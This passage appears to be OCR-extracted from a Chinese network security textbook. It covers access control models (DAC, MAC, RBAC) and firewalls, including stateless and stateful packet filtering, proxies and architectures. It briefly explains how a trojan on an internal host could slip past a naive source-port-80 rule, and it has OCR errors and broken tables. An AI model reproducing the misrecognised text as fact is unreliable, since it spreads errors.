方式 ,可 以 看 成 是 提取 和 矩阵 中 的 行 信 息 而 生成 。ACCL 着 眼 于 主体 的 访问 权限 ,与 主体 有 
关 的 所 有 客体 都 出 现在 该 主体 的 ACCL 中 。 能 力 是 受 一 定 机 制 保护 的 客体 标记 ,标记 主 
体 对 客体 的 访问 权限 ,只 有 主体 对 某 个 客体 拥有 访问 能 力 时 , 它 才 能 访问 这 个 客体 ,图 7-2 
示例 了 用 ACCL 表示 表 7-1 访问 矩阵 的 形式 。 
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图 7-2 访问 能 力 表示 例 


ACCL 的 问题 在 于 ,如 果 需 要 从 客体 出 发 确定 哪些 主体 可 以 访问 该 客体 , 则 非常 困 
难 , 解 决 方法 只 能 是 穷 举 遍历 ,在 所 有 的 主体 ACCL 中 查找 相应 客体 的 访问 权限 。 

4. 授权 关系 表 

ACCL 和 ACL 都 存在 一 定 不 足 , 而 授权 关系 表 综 合 了 两 种 方法 的 优点 。 它 使 用 一 个 
3 元 组 表示 主体 和 客体 的 一 种 权限 关系 ,将 这 张 表 按 客体 排序 , 则 可 以 拥有 ACCL 的 优 
点 , 按 主体 排序 , 则 拥有 ACL 的 优点 。 主 体 和 客体 之 间 如 果 没 有 权限 关系 , 则 不 需要 在 
表 中 出 现 ,避免 了 访问 和 矩阵 中 的 空白 元 素 问 题 。 表 7-2 列 出 了 对 应 表 7-1 的 授权 关 
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表 7-2 授权 关系 表示 例 
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7.1.2 自主 访问 控制 


自主 访问 控制 (Discretionary Access Control,DAC) 基 于 主客 体 的 隶属 关系 ,自主 ” 
是 指 客体 的 拥有 者 可 以 自行 将 访问 权限 分 配给 其 他 主体 或 将 权限 从 其 他 主体 收回 , 即 客 
体 的 拥有 者 决定 其 他 主体 如 何 访问 该 客体 。 需 要 自主 访问 控制 的 客体 数量 取决 于 系统 环 
境 , 通 常 包括 对 文件 ,目录 、IPC 以 及 设备 的 访问 控制 。 

DAC 的 实现 方式 可 以 是 ACCL 和 ACL, 也 有 基于 口令 的 机 制 , 即 每 个 客体 相应 地 有 
一 个 口令 ,只 有 知道 该 口令 才 可 以 访问 该 客体 。 在 具体 实现 方法 上 ,针对 "* 谁 ?具备 “自主 ” 
的 权利 这 个 问题 ,有 三 种 解决 方案 : 管理 员 即 超级 用 户 ; @@ 对 主体 和 客体 划分 等 级 ,高 
于 客体 一 定 等 级 的 主体 即 可 认为 有 “自主 " 权 ; 加 传递 和 继承 , 即 * 自 主权 可 以 由 客体 的 
创建 者 授予 其 他 主体 。 

DAC 基于 主体 ,所 以 具有 很 高 的 灵活 性 ,特别 适合 于 各 类 操作 系统 和 应 用 程序 。 在 
许多 应 用 场景 , 某 客体 的 拥有 者 需要 在 没有 管理 员 介入 的 情况 下 ,自行 设 定 其 他 主体 访问 
该 客体 的 权限 ,此 时 采用 DAC 就 非常 合适 。 但 正 是 由 于 这 种 灵活 性 ,信息 总 是 可 以 从 一 
个 主体 传 给 另 一 个 主体 ,即使 对 于 高 度 敏 感 的 信息 也 是 如 此 ,因此 DAC 存在 严重 安全 隐 
患 。 例 如 ,一 个 主体 用 户 能 读 取 某 些 数据 ,那么 他 就 可 以 把 这 些 数 据 转发 给 那些 本 来 没有 
权限 阅读 这 些 数据 的 用 户 。 因 为 DAC 无 法 对 已 经 拥有 权限 的 主体 施加 任何 限制 ,因此 
在 DAC 环境 中 ,通常 默认 设置 是 拒绝 访问 以 提高 安全 性 。 


7.1.3 强制 访问 控制 


强制 访问 控制 (Mandatory Access Control,MAC) 是 比较 客体 标记 和 主体 的 访问 等 
级 对 资源 访问 实现 限制 的 一 种 方法 , 它 将 所 有 主体 和 客体 分 成 不 同 的 安全 等 级 ,等 级 由 高 
到 低 一 般 分 为 绝密 级 (Top Secret,TS) 、 秘 密级 (Secret,S) 、 机 密级 (Confidential,C) 和 无 
密级 (Unclassified,U) 。 安 全 级 别 由 管理 员 预 先 分 配 , 具 有 强制 性 ,主体 不 能 改变 自身 或 
其 他 主客 体 的 安全 级 别 。 

在 MAC 中 ,主体 对 客体 的 访问 有 以 下 四 种 方式 : 

(1) 向 下 读 (Read Down,RD): 主体 级 别 高 于 客体 级 别 时 ,允许 读 操作 。 

(2) 向 上 读 (Read Up,RU): 主体 级 别 低 于 客体 级 别 时 ,允许 读 操作 。 

(3) 向 下 写 (Write Down, WD) : 主体 级 别 高 于 客体 级 别 时 ,允许 写 或 执行 操作 。 





网 络 攻防 技术 与 实战 





深入 理解 信息 安全 防护 体系 





(4) 向 上 写 (Write Up, WU): 主体 级 别 低 于 客体 级 别 时 ,允许 写 或 执行 操作 。 

MAC 有 三 种 主要 的 模型 Bell-Lapadula (BLP) 模 型 、Biba 模型 和 Lattice 模型 。 
BLP 模型 用 于 维护 系统 的 保密 性 ,禁止 RU 和 WD 操作 ,只 允许 RD 和 WU 操作 。Biba 
模型 与 BLP 模型 相反 , 它 用 于 维护 系统 完整 性 ,不 允许 WU 和 RD 操作 ,从 而 保证 高 级 别 
客体 不 会 被 低级 别 主体 越权 算 改 。Lattice 模型 中 ,无 论 主体 对 客体 进行 何 种 访问 ,必须 
满足 主体 的 安全 级 别 大 于 客体 的 安全 级 别 ,系统 才 允 许 主体 访问 。 

MAC 能 够 弥补 DAC 在 安全 防护 方面 的 不 足 , 特 别 是 防御 恶意 代码 进行 的 窃 密 活 
动 ,但 是 MAC 的 灵活 性 比较 差 。 在 现实 应 用 中 往往 是 将 MAC 和 DAC 结合 在 一 起 使 
用 ,以 DAC 为 基础 控制 ,而 MAC 为 增强 控制 。 


7.1.4 角色 访问 控制 


基于 角色 的 访问 控制 (Role-based Access Control,RBAC) 的 基本 思想 是 在 主体 和 访 
问 权限 之 间 引 入 角色 的 概念 ,通过 对 角色 的 授权 来 控制 主体 对 客体 的 访问 。 角 色 指 一 个 
可 以 完成 某 个 事务 集合 的 命名 组 ,不 同 的 角色 通过 不 同 的 事务 执行 各 自 的 功能 。 事 务 指 
完成 某 种 功能 的 过 程 ,可 以 是 程序 或 程序 的 一 部 分 。RBAC 从 控制 主体 的 角度 出 发 ,根据 
系统 中 相对 稳定 的 职责 来 划分 角色 ,将 访问 客体 的 权限 与 角色 联系 起 来 ,给 主体 分 配合 适 
的 角色 ,让 主体 与 权限 相 联 系 。 

角色 由 系统 管理 员 定 义 和 增 删 , 主 体 与 客体 无 直接 联系 ,只 有 通过 角色 才 享 有 该 角 
色 对 应 的 客体 访问 权限 ,从 而 访问 相应 客体 。 主 体 和 角色 之 间 是 多 对 多 的 关系 ,一 个 
主体 可 以 分 配 多 个 角色 ,而 多 个 主体 可 以 分 配 同一 个 角色 。 角 色 可 以 划分 成 不 同 的 等 
级 ,通过 角色 等 级 关系 反映 一 个 系统 的 职权 和 责任 关系 。RBAC 可 以 定义 不 同 的 约束 
规则 来 限制 这 些 角色 之 间 的 等 级 关系 ,例如 角色 互 斥 、 运 行 互 斥 、 先 决 条 件 限制 和 基数 
约束 等 。 

RBAC 的 整体 流程 如 图 7-3 所 示 ,主体 首先 经 过 认证 获得 一 个 角色 ,该 角色 提出 访问 
请 求 ,然后 被 分 配 一 定 的 权限 ,主体 以 该 角色 访问 客体 ,RBAC 检查 角色 的 权限 ,决定 是 否 
允许 访问 。 























1. 认 证 3. 请 求 
主体 | 角色 权限 | 
2. 分 配角 色 4. 权限 分 配 
5. 访问 请 求 
| RBAC [6 访问 | 客体 | 











图 7-3 RBAC 流程 


RBAC 通过 角色 的 概念 实现 主体 与 访问 权限 的 逻辑 分 离 ,是 一 种 十 分 灵活 的 控制 方 
式 。 它 可 以 较 好 地 实现 最 小 权限 原则 ,方便 地 实现 主体 的 授权 管理 。 


第 7 章 访问 控制 与 防火 墙 区 .2 


7.2 防 火 墙 


防火 墙 是 指 设置 在 不 同 网 络 ( 如 企业 内 网 和 公共 网 络 ) 之 间 的 一 系列 部 件 的 组 合 ， 
不 同 网 络 之 间 的 唯一 出 入 口 ,能 够 根据 安全 需求 控制 出 人 网 络 的 信息 流 , 被 称 为 网 络 安全 
的 第 一 道 防 线 。 

要 使 防火 墙 正 常 工作 ,必须 满足 三 方面 的 基本 特性 : 

(1) 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 流 都 必须 经 过 防火 墙 。 

只 有 当 防 火 增 是 内 外 网 络 之 间 通 信 的 唯一 通道 时 , 才 可 以 全 面 有 效 地 保护 目标 网 络 
不 受 攻击 。 这 个 通道 是 目标 网 络 的 边界 .防火墙 的 目的 就 是 在 这 个 边界 实现 对 出 入 网 络 
的 数据 进行 审计 和 控制 。 但 是 ,对 于 不 通过 防火 墙 的 数据 ,防火 墙 无 法 监控 。 

(2) 只 有 符合 安全 策略 的 数据 流 才能 通过 防火 墙 。 

防火 墙 的 基本 功能 是 保证 数据 的 合法 性 ,在 此 前 提 下 将 数据 快速 从 一 条 链 路 转发 到 
另外 一 条 链 路 。 它 从 网 络 接口 接收 数据 后 ,在 适当 的 协议 层 检测 数据 是 否 满足 相应 的 规 
则 ,将 符合 规则 的 数据 从 相应 网 络 接口 送出 ,对 不 符合 规则 的 数据 则 丢弃 。 

(3) 防火 墙 自身 具有 很 强 的 抗 攻 击 能 力 。 

防火 墙 处 于 网 络 边界 ,时 刻 面 对 网 络 攻击 ,这 就 要 求 防火 墙 自身 必须 能 够 抵御 攻击 。 
特别 是 运行 防火 墙 的 操作 系统 必须 可 信 。 另 外, 防火墙 上 不 应 该 运行 其 他 服务 程序 以 保 
证 安全 性 。 

防火 墙 对 网 络 的 保护 主要 体现 在 两 方面 : 中 防止 非法 的 外 部 用 户 越权 访问 内 网 资 
源 ; @ 人 允许 合法 的 外 部 用 户 以 指定 权限 访问 指定 的 内 网 资源 。 

防火 增 的 主要 功能 如 下 : 

1. 服务 控制 

这 是 防火 墙 的 基本 功能 ,制定 安全 策略 只 允许 不 同 网 络 间 相互 交换 与 指定 服务 相关 
的 数据 ,可 以 过 滤 不 安全 的 服务 以 降低 安全 风险 ,可 以 保护 网 络 中 存在 漏洞 的 服务 ,可 以 
指定 外 部 用 户 只 能 访问 指定 站 点 的 指定 服务 而 禁止 对 其 他 站 点 的 访问 。 

2. 方向 控制 

防火 墙 还 可 以 限制 某 个 服务 的 发 起 端 , 仅 允 许 网 络 之 间 交 换 由 某 个 特定 终端 发 起 的 
与 指定 服务 有 关 的 数据 。 例 如 ,可 以 设置 一 条 安全 策略 仅 允许 内 部 主机 访问 公共 网 络 的 
Web 服务 ,但 不 是 禁止 外 部 主机 访问 内 部 网 络 的 Web 服务 。 

3. 用 户 控制 

防火 墙 可 以 对 网 络 中 的 各 种 访问 行为 统一 管理 ,提供 统一 的 身份 认证 机 制 , 然 后 设置 
每 个 用 户 的 访问 权限 ,根据 认证 结果 确定 该 用 户 本 次 访问 的 合法 性 ,从 而 实现 对 用 户 访问 
过 程 的 控制 。 

4. 行为 控制 

防火 墙 可 以 制定 安全 策略 对 网 络 访问 的 内 容 和 行为 进行 控制 ,例如 可 以 过 滤 垃 圾 邮 
件 , 可 以 过 滤 内 部 用 户 访问 外 部 网 获得 的 敏感 信息 ,可 以 限制 指定 时 间 内 针对 指定 服务 器 
的 TCP 连接 次 数 , 可 以 限制 指定 时 间 内 下 载 的 数据 流量 ,还 可 以 分 析 网 络 数据 以 检测 是 
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否 存在 网 络 攻击 。 

5. 监控 审计 

防火 墙 可 以 记录 下 所 有 的 网 络 访问 并 写 人 日 志文 件 , 同 时 提供 网 络 使 用 的 统计 数据 ， 
监控 网 络 使 用 是 否 正常 。 

防火 墙 可 以 有 多 种 分 类 方式 (图 7-4) ,从 实现 方式 划分 ,可 以 分 为 软件 防火 墙 和 硬件 
防火 墙 ， 从 作用 范围 划分 ,可 以 分 为 个 人 防火 墙 和 网 络 防火 墙 ; 从 协议 层次 划分 ,可 分 为 
包 过 滤 防 火 墙 .电路 层 网 关 和 应 用 层 网 关 ; 从 分 析 方 法 划分 ,可 分 为 无 状态 包 过 滤 防 火 墙 
和 有 状态 包 过 滤 防 火 墙 。 
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个 人 防火 墙 | 网 络 防火 墙 
1 | 


包 过 滤 防 火 墙 电路 层 网 关 应 用 层 网 关 | 
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无 状态 包 过 滤 有 状态 包 过 滤 
防火 墙 防火 墙 
图 7-4 防火 墙 分 类 


个 人 防火 墙 只 保护 单 台 主机 ,用 于 对 进出 主机 的 信息 流 实施 监控 ,通常 是 包 过 滤 防 火 
墙 ,如 Windows 自 带 的 防火 墙 。 个 人 防火 墙 也 会 与 操作 系统 的 安全 访问 功能 相 结合 , 提 
供 基于 文件 或 进程 的 安全 访问 策略 。 网 络 防 火 墙 位 于 内 部 网 络 和 外 部 网 络 的 连接 点 ,对 
内 部 网 络 的 资源 进行 保护 。 


7.2.1 包 过 滤 防 火 墙 


包 过 滤 防 火 墙 工作 在 网 络 层 ,对 用 户 透明 ,分 为 无 状态 和 有 状态 两 种 。 无 状态 防火 墙 
基于 单个 IP 报 文 进行 操作 ,每 个 报 文 都 是 独立 分 析 ; 而 有 状态 防火 墙 基于 会 话 进行 操 
作 , 过 滤 报 文 时 不 仅 需 要 考虑 报 文 的 自身 属性 ,还 要 根据 其 所 属 会 话 的 状态 决定 对 该 报 文 
采取 何 种 操作 。 

1. 无 状态 包 过 滤 防 火 墙 

无 状态 包 过 滤 防 火 墙 建立 一 个 规则 集合 ,根据 该 集合 对 每 个 IP 报 文 进行 分 析 。 其 基 
本 工作 流程 如 图 7-5 所 示 , 当 一 个 IP 报 文 经 过 防火 墙 时 ,防火 墙 启用 规则 集合 对 其 进行 
逐条 规则 匹配 ,寻找 第 一 条 匹配 的 规则 ,如 果 匹 配 了 一 条 规则 , 则 执行 该 规则 定义 的 动作 ， 
不 再 尝试 去 匹配 剩余 的 规则 。 每 条 规则 定义 的 动作 通常 是 转发 .丢弃 或 记录 等 。 如 果 报 
文 与 规则 集合 中 的 所 有 规则 都 不 匹配 , 则 对 该 报 文 执 行 防火 墙 的 默认 规则 。 

防火 墙 的 默认 规则 有 两 种 实现 方案 。 

(1) 一 切 未 被 允许 的 都 是 禁止 的 。 即 如 果 IP 报 文 与 规则 集合 中 的 所 有 规则 都 不 匹 
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7-5 无 状态 包 过 滤 防 火 墙 流程 


配 , 则 默认 丢弃 该 报 文 。 这 种 方法 很 安全 ,但 是 限制 了 用 户 的 便利 性 。 

(2) 一 切 未 被 禁止 的 都 是 允许 的 。 即 如 果 IP 报 文 与 规则 集合 中 的 所 有 规则 都 不 匹 
配 , 则 默认 转发 该 报 文 。 这 种 方法 很 灵活 ,但 是 安全 性 较 差 。 

包 过 滤 防 火 墙 的 规则 主要 分 析 IP 协议 头 部 信息 \ 传 输 层 的 TCP/UDP 端口 号 ,TCP 
标记 等 ,判断 依据 通常 包括 : 

(1) 协议 类 型 ,如 TCP、UDP、ICMP、IGMP 等 ; 

(2) 源 和 目的 IP 地 址 和 端口 ; 

(3) TCP 标记 ,如 SYN 、ACK FIN RST 等 ; 

(4) 网 络 层 协议 选项 ,如 ICMP ECHO ICMP REPLY 等 ; 

(5) 报 文 的 传递 方向 ,如 进入 接口 还 是 从 接口 发 出 ; 

(6) 报 文 流 过 的 接口 名 ,如 eth0。 

表 7-3 给 出 了 一 个 规则 集合 示例 ,用 于 设置 访问 网 络 192. 168.0/24( 图 7-6) 的 安全 策 
略 。 其 中 规则 1 允许 所 有 主机 访问 服务 器 192. 168. 0. 1 的 HTTP 端口 (80); 规则 2 允许 
所 有 IP 访问 服务 器 192. 168. 0. 2 的 POP3(110) 和 SMTP(25) 服 务 ; 规则 3 允许 访问 服 


192.168.0.1 


192.168.0.8 


192.168.0.2 





192.168.0.4 192.168.0.5 


图 7-6 防火 墙 应 用 拓扑 示例 
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务 器 192.168.0.8 的 DNS(53) 服 务 ; 规则 4 允许 所 有 主机 PING 网 段 192.168.0/24; 规 
则 5 即 为 默认 规则 ,拒绝 所 有 与 上 述 4 条 规则 不 匹配 的 报 文 。“Any” 用 于 表示 任何 项 ， 
“/” 表 示 不 存在 该 项 ,如 ICMP 协议 就 不 存在 端口 项 。 规则 1.2 和 3 属于 按 服务 过 滤 , 而 
规则 4 属于 按 协议 过 滤 。 规 则 集合 中 的 方向 指示 必须 要 设置 正确 , 它 通 常 与 接口 名 紧密 
联系 在 一 起 , 表 7-3 中 的 规则 方向 为 和 方向 (in), 因 此 该 规则 集合 必须 设置 在 接口 1 处 
(读者 可 以 思考 ,如 果 规 则 集合 放 在 接口 2 处 ,结果 会 怎样 ?)。 在 接口 1 的 出 方向 和 接口 
2 并 没有 启用 防火 墙 配置 ,因此 在 接口 1 的 出 方向 和 接口 2 处 ,IP 报 文 的 转发 不 受 防 火 墙 
影响 。 在 实际 实现 中 ,上 述 规则 中 各 个 字段 的 值 是 灵活 可 控 的 ,例如 端口 号 可 以 使 用 范围 
表示 ,如 “大 于 1024 端口 “不 等 于 80 端口 "等 。 
表 7-3 包 过 滤 防火 墙 规则 集合 示例 


























规则 | 协议 | 方向 | 源 IP 地 址 目的 IP 地 址 源 端口 目标 端口 动作 
1 TCP in Any 192. 168. 0. 1/32 Any HTTP(80) 接受 
2 TCP in Any 192. 168. 0. 2/32 Any | POP3 ,SMTP 接受 
3 UDP in Any 192. 168. 0. 8/32 Any DNS 接受 
4 ICMP in Any 192. 168. 0/24 Any / 接受 
5 Any in Any Any Any Any 拒绝 























上 述 规则 集合 所 表达 的 安全 策略 是 : 只 允许 外 部 主机 访问 本 网 段 的 Web、SMTP、 
POP3 和 DNS 服务 ,另外 允许 本 网 段 与 其 他 网 段 互相 PING 通 。 那么, 如果 还 需要 增加 
策略 “允许 本 网 段 主机 访问 外 部 网 络 的 Web 服务 ”, 仅 在 默认 规则 前 增加 如 下 规则 是 否 


可 行 ? 





TCP in Any 192. 168. 0/24 80 Any 接受 





























无 状态 包 过 滤 防 火 墙 主要 实现 了 防火 墙 功能 的 服务 控制 和 方向 控制 两 部 分 ,但 是 它 
只 能 基于 端口 来 识别 IP 报 文 是 否 属 于 某 类 服务 报 文 ,无 法 识别 谁 是 服务 的 发 起 方 ,也 无 
法 识别 具体 报 文 是 否 确实 属于 相应 服务 。 新 增 的 规则 无 法 识别 是 内 网 主机 主动 连接 外 部 
主机 的 80 端口 ,还 是 外 部 主机 的 80 端口 主动 连接 内 部 主机 。 假 设 主机 192. 168. 0.4 已 经 
被 攻击 者 入侵 ,并 且 安 装 了 远程 控制 木马 ,那么 攻击 者 以 源 端 口 80 远程 连接 192. 168. 0. 4 
的 木马 端口 , 即 可 绕 过 上 述 规则 。 因 为 攻击 报 文 与 上 述 规则 相 匹 配 , 它 进入 接口 1 时 , 源 
端口 是 80 ,目标 地 址 属于 网 段 192. 168. 0/24 ,所 以 会 被 防火 墙 接受 。 使 用 有 状态 包 过 滤 
防火 墙 可 以 解决 此 类 问题 。 

2. 有 状态 包 过 滤 防 火 墙 

有 状态 包 过 滤 防 火 墙 相当 于 传输 层 和 应 用 层 的 过 滤 , 最 重要 的 是 实现 会 话 的 跟踪 功 
能 。 根 据 报 文 所 属 协议 的 不 同 , 自 动 归 类 属于 同一 个 会 话 的 所 有 报 文 ,如 FTP 会 话 、 
HTTP 会 话 ,TCP 连接 等 。 它 负责 建立 报 文 的 会 话 状态 表 , 对 在 不 同 网 络 之 间 传 递 的 报 
文 从 会 话 角度 进行 监测 ,利用 状态 表 跟 踪 每 个 会 话 状 态 。 例 如 ,对 于 内 部 主机 对 外 部 主机 
的 连接 请 求 ,防火 墙 可 以 认为 这 是 一 个 会 话 的 开始 ,在 状态 表 中 记录 该 会 话 ,并 允许 会 话 
中 的 后 续 报 文通 过 ; 反之 ,对 于 外 部 主机 对 内 部 主机 的 连接 请 求 ,防火 墙 则 可 直接 拒绝 。 
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状态 表 随 着 会 话 的 进行 会 动态 修改 该 会 话 的 当前 状态 。 

有 状态 包 过 滤 防 火 墙 的 规则 可 以 看 作 访 问 控制 策略 ,包含 三 部 分 信息 : 

(1) 报 文 流动 方向 和 所 属 服务 ; 

(2) 发 起 会 话 的 终端 地 址 范围 .接受 会 话 的 终端 地 址 范围 ; 

(3) 会 话 各 阶段 的 状态 。 

有 状态 包 过 滤 防 火 墙 的 工作 流程 如 图 7-7 所 示 。 报 文 到 达 防 火 墙 时 ,防火 墙 首先 判 
断 该 报 文 是 否 属于 某 个 已 有 会 话 ,如 果 属 于 , 则 判定 该 报 文 是 否 满足 会 话 相应 的 访问 控制 
策略 ,如 是 则 转发 报 文 并 更 新 会 话 状 态 ,否则 丢弃 报 文 或 记录 日 志 ; 如 果 不 属于 任何 会 
话 , 则 根据 访问 控制 策略 判定 是 否 允 许 该 报 文通 过 ,如 是 则 转发 报 文 并 建立 会 话 和 更 新 会 
话 状 态 , 否 则 丢弃 报 文 或 记录 日 志 。 





报 文 到 达 防 火 墙 端口 


















丢弃 报 文 或 记录 


图 7-7 有 状态 防火 墙 工作 流程 








转发 报 文 并 
更 新 会 话 状态 


以 “192.168. 0/24 网 段 主动 连接 外 部 主机 80 端口 的 Web 服务 ”为 例 ,该 策略 表明 会 
话 发 起 方 是 网 段 192. 168. 0/24 ,目标 是 外 部 主机 ( 即 所 有 不 属于 网 段 192. 168. 0/24 的 主 
机 ) 。 因 为 Web 服务 基于 TCP 连接 ,所 以 该 策略 对 应 的 会 话 包括 TCP 三 路 握手 .HTTP 
请 求 和 应 答 、TCP 四 路 握手 等 状态 信息 ,如 图 7-8 所 示 。 

只 有 内 部 网 络 主机 发 起 连接 请 求 时 ,防火 墙 才 会 根据 访问 控制 策略 在 状态 表 中 增加 
一 个 会 话 项 。 在 此 之 前 ,任何 企图 以 源 端 口 80 与 内 部 主机 通信 的 报 文 都 会 被 丢弃 。 

当 防火 墙 收 到 来 自 192. 168. 0. 4 的 1234 端口 ,目标 是 202. 101. 194. 153 的 80 端口 
的 TCP 报 文 时 ,如 果 该 报 文 不 属于 会 话 状 态 表 中 的 任何 会 话 , 则 搜索 访问 控制 策略 集合 ， 
判定 是 否 应 该 建立 一 个 新 的 会 话 ; 如 果 该 报 文 属于 会 话 状态 表 中 的 某 个 会 话 , 则 直接 转 
发 该 报 文 。 根 据 访问 策略 ,应 该 建立 一 个 新 会 话 , 该 会 话 在 状态 表 中 的 状态 变化 如 表 7-4 
所 列 。 

@ 初始 建立 时 ,其 状态 属于 TCP_SYN_SENT ,会话 发 起 方 是 192. 168. 0. 4, 接 受 方 
是 202. 101. 194. 153。 
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192.168.0.4 
202.101.194.153 
> Syn,seq—x 
syn,seq=y,seq=X+1 
-| 
ack=y+1 
三 HTTP 请 求 
加 HTTP 应 答 
| 
fin,seq=u 
ack=u+1 ™| 
加 fin,seq=v 
一 | 
中 ack=v+1 
图 7-8 访问 控制 策略 示例 
表 7-4 防火 墙 会 话 状态 表示 例 
源 IP 目标 IP 源 端口 目标 端口 状 态 服务 
192. 168.0. 4 202. 101. 194. 153 1234 80 TCP_SYN_SENT HTTP 
202. 101. 194. 153 | 192. 168. 0. 4 80 1234 | TCP_SYN_RCVD HTTP 
192. 168. 0.4 202. 101. 194. 153 1234 80 ESTABLISHED HTTP 
192. 168. 0.4 202. 101. 194. 153 1234 80 HTTP_REQUEST_SENT HTTP 
202. 101. 194. 153 | 192. 168. 0. 4 80 1234 | ESTABLISHED 
202. 101. 194. 153 | 192. 168.0.4 80 1234 | TCP_FIN_SENT HTTP 
192. 168. 0. 4 202. 101. 194. 153 1234 80 TCP_FIN_RCVD HTTP 
192. 168. 0. 4 202. 101. 194. 153 1234 80 TCP_FIN_SENT HTTP 
202. 101. 194.153 | 192.168.0.4 80 1234 | TCP_FIN_RCVD HTTP 

















@ 会 话 可 接受 的 报 文 只 能 是 从 202. 101. 194. 153 的 80 端口 发 来 的 带 有 SYN 和 
ACK 标记 的 报 文 , 状 态 变 为 TCP_SYN_RCVD。 

@ 会 话 可 接受 的 报 文 是 从 192. 168. 0. 4 发 往 202. 101. 194. 153 的 确认 报 文 ,状态 变 
为 ESTABLISHED。 

@ 此 时 可 接受 的 报 文 是 从 192. 168. 0. 4 发 往 202. 101. 194. 153 的 HTTP 请 求 报 
文 ,状态 变 为 HTTP_REQUEST_SENT, 表 示 会 话 在 等 待 202. 101. 194. 153 的 HTTP 应 
答 报 文 。 

@ 当 会 话 接收 到 HTTP 应 答 报 文 后 ,状态 又 转 为 ESTABLISHED, 表 示 此 时 准备 继 
续 接受 来 自 192. 168. 0.4 的 HTTP 请 求 报 文 或 者 来 自 202. 101. 194. 153 的 连接 结束 请 
求 报 文 。 

有 状态 包 过 滤 防 火 墙 相 比 无 状态 包 过 滤 防 火 墙 安 全 性 更 好 , 相 比 代理 防火 墙 扩 展 性 
更 好 ,而 且 配 置 方便 ,应 用 范围 广 。 但 是 ,有 状态 包 过 滤 防 火 墙 会 对 每 个 会 话 进行 记录 分 
析 ,因此 会 造成 性 能 下 降 , 当 存在 大 量规 则 时 尤其 明显 。 

包 过 滤 防 火 墙 的 优点 是 实现 灵活 , 既 可 以 与 现 有 路 由 器 集成 ,也 可 以 使 用 独立 软件 实 
现 ,并 且 对 用 户 透 明 、 成 本 低 、 速 度 快 。 其 主要 缺点 是 : 


(1) 配置 困难 , 当 规则 较 多 时 ,特别 容易 出 错 ; 

(2) 工作 在 网 络 层 , 无 法 检测 针对 应 用 层 的 攻击 ; 

(3) 包 过 滤 防 火 墙 基于 IP 头 部 信息 进行 过 滤 , 而 这 些 信息 都 可 以 伪造 ,使 得 防火 墙 
容易 被 绕 过 。 


7.2.2 代理 防火 墙 


真正 可 靠 的 防火 墙 应 该 可 以 在 应 用 层 检 测 所 有 数据 。 代 理 防火 墙 提供 了 一 种 更 好 的 
安全 控制 机 制 ,允许 客户 端 通过 代理 与 网 络 服务 进行 非 直接 的 连接 。 所 谓 代理 服务 器 是 
指 代 表 内 部 网 络 向 外 部 网 络 服务 发 起 连接 请 求 的 程序 ,包含 代理 服务 器 进程 和 代理 客户 
机 进程 两 个 主要 组 件 ,其 基本 工作 原理 如 图 7-9 所 示 。 代 理 服务 器 进程 负责 监听 网 络 内 
部 客户 机 的 服务 请 求 , 当 连接 请 求 到 来 时 ,首先 进行 身份 认证 和 授权 ,并 根据 安全 策略 决 
定 是 否 转发 该 请 求 。 如 果 转 发 该 请 求 , 则 代理 客户 机 进程 负责 转发 请 求 并 接受 服务 器 的 
应 答 ,并 将 应 答 数据 转发 给 代理 服务 器 进程 ,最 后 代理 服务 器 进程 再 转发 给 真实 客户 。 整 
个 过 程 中 ,代理 服务 器 一 直 监 视 客户 程序 的 网 络 行为 ,一 旦 发 现 异常 ,可 随时 中 断 连接 并 
自动 对 所 有 网 络 行为 进行 记录 。 


























连 近 请求 
Pp” ~~、、 转 发 请 求 
ma | /| 代理 服务 器 | 一 代理 客户 机 | pap 
客户 程 认 | 《| “进程 安全 策略 加 | : 汉 ) | 服务 程序 
“oy 一” 响应 
转发 响应 sy 人 


图 7-9 代理 服务 器 工作 原理 


代理 服务 器 阻 断 了 内 部 网 络 与 外 部 网 络 的 直接 联系 ,同时 可 以 提高 访问 性 能 。 因 为 
它 通 常设 有 高 速 缓存 用 于 存储 客户 经 常 访问 的 内 容 , 当 多 个 用 户 访问 同一 内 容 时 ,代理 服 
务 器 只 需要 将 缓存 中 的 内 容 返回 即 可 ,不 需要 访问 真实 的 服务 器 ,从 而 节约 了 时 间 和 网 络 
带宽 。 

代理 服务 器 的 类 型 包括 应 用 层 代 理 、 电 路 层 代理 。 应 用 层 代 理 为 特定 的 应 用 提供 代 
理 服 务 ,对 应 用 层 协 议 进行 解析 , 它 工作 在 应 用 层 , 因 此 也 称 为 应 用 层 网 关 。 它 通常 与 包 
过 滤 防 火 墙 配合 使 用 ,每 种 应 用 协议 都 要 提供 相应 的 应 用 层 代 理 , 包 括 FTP 代理 .HTTP 
代理 和 邮件 代理 等 。 应 用 层 代理 的 优点 是 实现 用 户 控制 .可 以 对 应 用 层 数据 进行 细 粒 度 
的 控制 ; 缺点 是 效率 较 低 , 由 于 要 深入 分 析 应 用 层 数据 ,性 能 不 如 包 过 滤 防 火 墙 ,难以 支 
持 大 规模 并 发 访问 。 

电路 层 代 理工 作 在 传输 层 , 相 当 于 传输 层 的 中 继 , 能 够 在 两 个 TCP/UDP 套 接 字 之 
间 复 制 数据 。 它 负责 接收 和 认证 客户 机 的 TCP 和 UDP 通信 报 文 ,如 果 报 文通 过 认证 并 
村 合 安全 策略 , 则 转发 该 报 文 给 实际 访问 的 服务 器 ,然后 接受 服务 器 应 答 并 转发 给 实际 客 
户 。 当 传输 层 中 继 建 立 后 ,电路 层 代 理 不 会 分 析 和 监视 后 续 传 递 的 应 用 层 数据 ,只 负责 监 
视 网 络 层 和 传输 层 的 头 部 信息 ,因此 电路 层 代理 可 以 同时 为 不 同 的 应 用 层 协 议 提 供 支持 ， 
不 需要 为 不 同 的 协议 配置 不 同 的 代理 程序 。 但 是 ,电路 层 代 理 无 法 提供 应 用 层 协 议 的 解 
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析 和 安全 性 检查 。 
7.2.3 体系 结构 


在 实际 网 络 环境 中 部 署 防火 墙 时 ,通常 采用 单一 包 过 滤 防 火 墙 , 单 穴 堡垒 主机 、 双 穴 
堡垒 主机 和 屏蔽 子 网 结构 等 几 种 部 署 方 式 中 的 一 种 。 

1. 单一 包 过 滤 防 火 墙 结构 

单一 包 过 滤 防 火 墙 结构 (图 7-10) 是 最 简单 的 基于 路 由 器 的 包 过 滤 体 系 结构 ,常见 于 
家 庭 网 络 或 小 企业 网 络 ,防火 墙 上 通常 结合 了 网 络 地 址 转换 (NAT) 、 路 由 器 和 包 过 滤 的 
功能 。 由 于 NAT 的 存在 ,外 网 主机 无 法 直接 向 内 部 主机 发 起 连接 ,因此 无 状态 包 过 滤 防 
